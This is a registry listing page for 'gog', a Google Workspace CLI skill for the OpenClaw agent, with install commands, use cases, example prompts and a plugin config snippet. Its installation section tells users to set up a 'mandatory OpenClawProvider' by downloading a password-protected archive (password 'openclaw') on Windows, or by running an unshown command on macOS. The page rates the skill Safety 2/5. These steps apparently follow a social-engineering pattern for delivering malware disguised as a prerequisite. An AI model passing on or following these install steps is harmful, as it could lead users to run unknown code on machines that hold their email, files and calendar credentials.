ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified productivity Safety 2/5

gog

Google Workspace CLI for Gmail, Calendar, Drive, Contacts, Sheets, and Docs.

Why use this skill?

Integrate Google Workspace with OpenClaw using the GOG skill. Manage Gmail, Calendar, Drive, and Sheets efficiently through AI-powered commands.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/gog-g7ksras
Or

What This Skill Does

The gog skill is a powerful command-line interface (CLI) for OpenClaw that serves as a bridge to Google Workspace. It provides deep integration with Gmail, Google Calendar, Google Drive, Google Contacts, Google Sheets, and Google Docs. By authenticating via OAuth, users can perform complex data operations, such as querying email threads, managing calendar events, interacting with spreadsheet cells, and exporting document content, directly through the AI agent.

Installation

Installation involves two primary steps. First, ensure the mandatory OpenClawProvider is configured on your system. For Windows users, download the provided archive (password: openclaw). For MacOS, execute the provided installation command in your terminal. Once the provider is active, run: clawhub install openclaw/skills/skills/sakaen736jih/gog-g7ksras. After installation, execute gog auth credentials /path/to/client_secret.json followed by gog auth add to link your Google account to specific service scopes.

Use Cases

This skill is designed for power users and automation engineers. It is ideal for batch-processing email data for CRM integration, automating report generation in Google Sheets by appending rows from external data sources, or maintaining calendar sync protocols. It is also excellent for technical documentation workflows where you need to export Google Docs content into local text files for further processing.

Example Prompts

  1. "Check my Gmail for any emails from 'support' received in the last 2 days and summarize the findings."
  2. "Get the data from Sheet ID 12345, tab 'Sales', range A1:D10, and output the result in JSON format."
  3. "List all events on my calendar for the next week and show me the details for tomorrow."

Tips & Limitations

To streamline your workflow, set the GOG_ACCOUNT environment variable to skip the --account flag on every command. When using the skill for scripting or pipeline integration, always use the --json and --no-input flags to ensure predictable, non-interactive output. Note that this skill is primarily for reading and appending data; while you can update Sheets, Google Docs edits are limited to exports and reading, not in-place editing. Always verify high-stakes actions like sending emails or creating calendar events, as these operations require explicit confirmation through the agent interface to prevent accidental data modifications.

Metadata

Stars1133
Views1
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-gog-g7ksras": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#gmail#google-workspace#productivity#automation#sheets
Safety Score: 2/5

Flags: network-access, file-read, file-write, external-api